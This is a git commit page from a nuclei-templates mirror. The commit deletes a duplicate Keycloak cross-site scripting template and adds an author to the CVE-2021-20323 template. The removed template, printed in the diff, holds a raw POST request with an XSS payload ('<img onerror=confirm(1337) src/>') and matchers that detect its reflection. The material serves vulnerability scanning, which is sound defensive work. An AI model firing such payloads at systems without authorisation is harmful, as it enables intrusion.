daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8752 from projectdiscovery/keyclock-duplicate 

Delete Duplicate Template (Keycloak)
patch-1
pussycat0x 2023-12-04 13:41:17 +05:30 committed by GitHub
parent 62712435cd a5bbd9593e
commit ed0d95c87d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 1 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
http/cves/2021/CVE-2021-20323.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-20323
info:
name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting
author: ndmalc
author: ndmalc,incogbyte
severity: medium
description: |
Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.

37
http/vulnerabilities/other/keycloak-xss.yaml
View File

@ -1,37 +0,0 @@
id: keycloak-xss
info:
name: Keycloak <= 8.0 - Cross-Site Scripting
author: incogbyte
severity: medium
description: Keycloak 8.0 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
reference:
- https://cure53.de/pentest-report_keycloak.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
metadata:
max-request: 1
tags: keycloak,xss
http:
- raw:
- |
POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"<img onerror=confirm(1337) src/>":1}
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
words:
- 'Unrecognized field "<img onerror=confirm(1337) src/>"'
# digest: 4b0a0048304602210093245586247588fc18bbafa0b7703409feb209b43eacaf3337ea76ea833227ed022100983104bf5b692534f304895471bc0ca7d9e8d9787070ba2222cbd19bd0d95c11:922c64590222798bb761d5b6d8e72950